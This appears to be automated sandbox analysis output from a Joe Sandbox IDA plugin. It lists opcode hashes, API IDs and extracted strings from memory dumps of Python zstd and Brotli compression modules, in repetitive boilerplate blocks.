                                                                                                                                                                                                            • String ID: input should have been fully consumed before calling flush() or finish()$unhandled compression mode; this should never happen$zstd compress error: %s$zstd compress error: %s
                                                                                                                                                                                                            • API String ID: 1818849939-4274625903
                                                                                                                                                                                                            • Opcode ID: 77fc79c38fef7e11aa5a1fd047066fcd0de3f8b668ccb8c8538c116bb5433d31
                                                                                                                                                                                                            • Instruction ID: d830a8950f9ce380d70d41d4412e05ec0ca55da24dc2ac46c9565330e6d546f8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 77fc79c38fef7e11aa5a1fd047066fcd0de3f8b668ccb8c8538c116bb5433d31
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 22515D62A0AA02A2EF208F35E48012C23A0FB59FE8F540232DE5D577DCDF78D9A5D354
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_free$Eval_FormatThread$Arg_DeallocInstanceKeywords_MemoryObject_ParseRestoreSaveSizeStringTuple
                                                                                                                                                                                                            • String ID: dict_data must be zstd.ZstdCompressionDict$unable to reference prepared dictionary: %s$unable to set decoding format: %s$unable to set max window size: %s$|OnI:ZstdDecompressor
                                                                                                                                                                                                            • API String ID: 87404611-2397764948
                                                                                                                                                                                                            • Opcode ID: 5439a6f41ddf9bd6b8b91b8cc1d2fc5b2fe86ac7138b73f41ef203ec199d8947
                                                                                                                                                                                                            • Instruction ID: 1fb0902ed1235253adcc4009c6f4e75cfc466a7b16bc2ade1aac1c222f4b8ad0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5439a6f41ddf9bd6b8b91b8cc1d2fc5b2fe86ac7138b73f41ef203ec199d8947
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 90A19876A0AB86A6EB548F25E54037D73A4FB44BD0F104135CA5E03B94DF7CE6A1D710
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Bytes_SizeString$From$DeallocErr_$Arg_FormatKeywords_ParseResizeTuplememmove
                                                                                                                                                                                                            • String ID: cannot read negative amounts less than -1$error ending compression stream: %s$stream is closed$|n:read1
                                                                                                                                                                                                            • API String ID: 3984132425-1687241806
                                                                                                                                                                                                            • Opcode ID: 5ac2da0e6f19fcc14031710fe0bcc3b0a61b4be40cb715125911d920d8ac487c
                                                                                                                                                                                                            • Instruction ID: d27a0aabcf6e108db3acc23e3799e4933b287d90b2cb462fd19cfdeee1798c02
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5ac2da0e6f19fcc14031710fe0bcc3b0a61b4be40cb715125911d920d8ac487c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 01614D62A06B02A5EF548F35D8402BC23A0FF58BE8F484636DA2D476E9EF7CD195D314
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Dealloc$Size$CallMethod_Object_$Bytes_List_$AppendFromString
                                                                                                                                                                                                            • String ID: join$read
                                                                                                                                                                                                            • API String ID: 4080431385-2265832736
                                                                                                                                                                                                            • Opcode ID: 1b83302fc6def570fef72cb30f1d7975b58b10f36c8e9df4ef7121bf91d21fdf
                                                                                                                                                                                                            • Instruction ID: b05913db2f833b498b6cd3c7b8818ac32b9e88996ef2b15de76cd7b3d322768b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b83302fc6def570fef72cb30f1d7975b58b10f36c8e9df4ef7121bf91d21fdf
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4D316D21A0BB43A1EE548F62B92027823A0EF59FC4F09403ADD4E46794EF7CE6669314
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Dealloc$Size$CallMethod_Object_$Bytes_List_$AppendFromString
                                                                                                                                                                                                            • String ID: join$read
                                                                                                                                                                                                            • API String ID: 4080431385-2265832736
                                                                                                                                                                                                            • Opcode ID: 1932e1ce21c1101fa72580c363a2aeaa948c0b2f06cf2fe368eb083c0a5486a3
                                                                                                                                                                                                            • Instruction ID: 9c3871c0ef63656eeab604019ef0dd4e450e36ef1ed34956b6bf9efa4aa73bfc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1932e1ce21c1101fa72580c363a2aeaa948c0b2f06cf2fe368eb083c0a5486a3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8315A21A0BB43A1EE159F76A96427823A0EF58FC0F084031DE0E46798EF7CE5659318
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3286045317.00007FF8A8131000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF8A8130000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286027871.00007FF8A8130000.00000002.00000001.01000000.00000022.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286080256.00007FF8A818A000.00000002.00000001.01000000.00000022.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286165822.00007FF8A81FF000.00000004.00000001.01000000.00000022.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8201000.00000002.00000001.01000000.00000022.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8205000.00000002.00000001.01000000.00000022.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a8130000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$Eval_SizeThread$Arg_Buffer_Bytes_FromKeywords_ParseReleaseRestoreSaveStringTuplefreemalloc
                                                                                                                                                                                                            • String ID: BrotliDecompress failed$y*|:decompress
                                                                                                                                                                                                            • API String ID: 122099618-3609120798
                                                                                                                                                                                                            • Opcode ID: 114f6e887864c9452b6e749f16f8915dfecf3fe5e2a9eda231f9669842758b46
                                                                                                                                                                                                            • Instruction ID: 435e9567f4c88d479ed6596a135b9955da89eb5d09c799e518fec1db44f26e1c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 114f6e887864c9452b6e749f16f8915dfecf3fe5e2a9eda231f9669842758b46
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28619C66B0AA46AAFB12DF61A4053AD23A5FB44BD8F040535DE0E13798DF3CD469C368
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_Object_String$Arg_AttrCallDeallocKeywords_MallocMem_MemoryObjectParseSizeTuple
                                                                                                                                                                                                            • String ID: O|KkOO:stream_writer$error setting source size: %s$must pass an object with a write() method$write
                                                                                                                                                                                                            • API String ID: 1212497781-2550967486
                                                                                                                                                                                                            • Opcode ID: e452cf039bbcf14119e626ec4ff6efa25af9fbc962411fef92bac67f2c767707
                                                                                                                                                                                                            • Instruction ID: 50d881c3f6202fea878a1de745c1692d7079f5aa52d71f8b0d168d84ced46b38
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e452cf039bbcf14119e626ec4ff6efa25af9fbc962411fef92bac67f2c767707
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F8515C32A09F4191EF50CF25E84426C33A4FB98BD4F164236CA6E837A4DF39D9A5C750
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_Eval_SizeThread$Arg_Buffer_CallDeallocFormatFromKeywords_Long_Method_Object_ParseReleaseRestoreSaveSize_tStringTuple
                                                                                                                                                                                                            • String ID: stream is closed$write$y*:write$zstd compress error: %s
                                                                                                                                                                                                            • API String ID: 11577103-1267270225
                                                                                                                                                                                                            • Opcode ID: 7f5e3c9c8c2f5d628b9e73e6d61b38095ba3ac1c94ae05fe3081825efbb7c134
                                                                                                                                                                                                            • Instruction ID: a122d04be74536f13194d52e8451c35db85fd280e854497c5d02c16c21d19a8f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7f5e3c9c8c2f5d628b9e73e6d61b38095ba3ac1c94ae05fe3081825efbb7c134
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 22416A22A0AB86A2EF609F61E85036973A0FB89FD4F440232CD4D53BA8DF7CD565D714
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: String$DeallocErr_Size$Bytes_CallMethod_Object_memmove
                                                                                                                                                                                                            • String ID: empty input$input exhausted$output flushed$read$skip_bytes larger than first input chunk; this scenario is currently unsupported
                                                                                                                                                                                                            • API String ID: 2468093315-3641255437
                                                                                                                                                                                                            • Opcode ID: 97b5381b809c0deef40c0f3da52942243a7b1eb6456e7ec4660ccf2a22f9985d
                                                                                                                                                                                                            • Instruction ID: 5df10bd2cea50bbd431b9d96c6fe04c6fc7fcbbcf602794818176ec1ca1c37c2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 97b5381b809c0deef40c0f3da52942243a7b1eb6456e7ec4660ccf2a22f9985d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BA514832A0AB4291EF518F29E44427C73A0FB58BD4F444136DE8C0B6A9DF7CE695D708
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: __acrt_iob_func$fflushfprintfmemmove$memset
                                                                                                                                                                                                            • String ID: %70s$statistics ...
                                                                                                                                                                                                            • API String ID: 2874110108-567790044
                                                                                                                                                                                                            • Opcode ID: b3207369c5fb7e5c867a2c8faa49bff396852c6391a003a834cf180303bfa8f3
                                                                                                                                                                                                            • Instruction ID: e1d400ce9cf0ba3f8c99f4c1af6f8cd7396cc19028836642c17e115fd8693b34
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b3207369c5fb7e5c867a2c8faa49bff396852c6391a003a834cf180303bfa8f3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3041E132A0AA8665EE109F21E8143AE6390FB88BE4F400135DE5D077D4DF7CE644C700
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Bytes_Dealloc$String$Eval_FromSizeThreadmemmove$Err_FormatResizeRestoreSave
                                                                                                                                                                                                            • String ID: zstd decompress error: %s
                                                                                                                                                                                                            • API String ID: 2184362011-3499397093
                                                                                                                                                                                                            • Opcode ID: 011419c727a6c26ac5b5895457481b28c9b9c3392dd1c99cebb3d819f8400b46
                                                                                                                                                                                                            • Instruction ID: eef5ae6bd1c3c95817455120e803b63fed439da74810c4c1da524c7861262406
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 011419c727a6c26ac5b5895457481b28c9b9c3392dd1c99cebb3d819f8400b46
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 33515C32A0AB8296EE54CF65E8442BEB3A4FB44BE0F144136CA9E07394DFBCE455D304
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_$FormatString
                                                                                                                                                                                                            • String ID: error resolving segment; this should not happen$item at offset %zd is too large for this platform$offset must be less than %zd$offset must be less than %zd$offset must be non-negative$offset must be non-negative
                                                                                                                                                                                                            • API String ID: 4212644371-688049692
                                                                                                                                                                                                            • Opcode ID: 83f31e855854578c42293d6b91b12c15aaa8d1d7ec5f3113b5115baa3ad9f62f
                                                                                                                                                                                                            • Instruction ID: 3236dbba5b51868f7f9598c4e4392a9d2a47f85043adb4e8084d4b7056a24397
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 83f31e855854578c42293d6b91b12c15aaa8d1d7ec5f3113b5115baa3ad9f62f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C513E66B1AF4292DE04CF6AE88006873A1FB88FD4F845136DE5E437A8CF3CE1658714
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Object_$Err_String$Arg_AttrBufferCallDeallocKeywords_MallocMem_MemoryObjectParseSizeTuple
                                                                                                                                                                                                            • String ID: O|Kkk:read_to_iter$error setting source size: %s$must pass an object with a read() method or conforms to buffer protocol$read
                                                                                                                                                                                                            • API String ID: 2338418839-654044346
                                                                                                                                                                                                            • Opcode ID: 230c2607c617f34c560b9dd446b2651e55ac4502a94072390c58cbd81300306c
                                                                                                                                                                                                            • Instruction ID: b96158b5029aa4165f06cd156d75cbf6ed57c4ef3e509c98209f12f277769e17
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 230c2607c617f34c560b9dd446b2651e55ac4502a94072390c58cbd81300306c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B7514432A0AB4691EF50CF25E88436933A0FB88BD4F154136CA9E877A4DF3DD5A9C714
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
• Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
• Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Bytes_Eval_SizeStringThread$Arg_Buffer_DeallocErr_FormatFromKeywords_ParseReleaseRestoreSaveTuple
                                                                                                                                                                                                            • String ID: cannot compress: %s$error setting source size: %s$unexpected partial frame flush$y*|O:compress
                                                                                                                                                                                                            • API String ID: 2919305294-1558872577
                                                                                                                                                                                                            • Opcode ID: fd162a9d042665ea90e9d8c9bb91e8b183d6504be21296b8603a9d43bde8ce9b
                                                                                                                                                                                                            • Instruction ID: b49f7147a8dcface6c57b1f3c5e534db6a59bd1c1a1c2407e0debe81f6d06929
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fd162a9d042665ea90e9d8c9bb91e8b183d6504be21296b8603a9d43bde8ce9b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17416032A0AB8692EE60DF65F8403B973A1FB84BD0F454136DA8E43BA4DF3CE5558714
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
• Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
• Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_Object_String$Arg_AttrBufferCallDeallocKeywords_MallocMem_MemoryObjectParseSizeTuple
                                                                                                                                                                                                            • String ID: O|kkk:read_to_iter$must pass an object with a read() method or conforms to buffer protocol$read$skip_bytes must be smaller than read_size
                                                                                                                                                                                                            • API String ID: 2052652018-480093875
                                                                                                                                                                                                            • Opcode ID: 0557616c26847e9448f34c692d6396c0f68fda28b8ee09bf469835c802ebfadc
                                                                                                                                                                                                            • Instruction ID: 4cc5d335e0e8dc9ebfcfbb58a90e288bb6be3005f38f6074ac5ca2b78320ce94
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0557616c26847e9448f34c692d6396c0f68fda28b8ee09bf469835c802ebfadc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 68410322A0AB06A1EF508F25E89437C33A1FB94BC4F558036CA5D867A4DF79D599C314
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
• Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
• Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_String$Arg_ParseSizeTuple_
                                                                                                                                                                                                            • String ID: cannot seek to negative position with SEEK_SET$cannot seek zstd decompression stream backwards$cannot seek zstd decompression stream backwards$n|i:seek$read$stream is closed$zstd decompression streams cannot be seeked with SEEK_END
                                                                                                                                                                                                            • API String ID: 3337331331-2278467308
                                                                                                                                                                                                            • Opcode ID: 4a294a183ccdb09e7186108e75849e64b3c1c6f1738adbd0c06011fe05450fa5
                                                                                                                                                                                                            • Instruction ID: be275ebdd9789afac2ea5084a004565c90f9152e7a00cde481eb084ff075d3db
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4a294a183ccdb09e7186108e75849e64b3c1c6f1738adbd0c06011fe05450fa5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0431AB22E0AA42E1EF548F65F8902B863A0FF44BC0F594039DA4D476A4DF7CE595E314
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
• Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
• Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
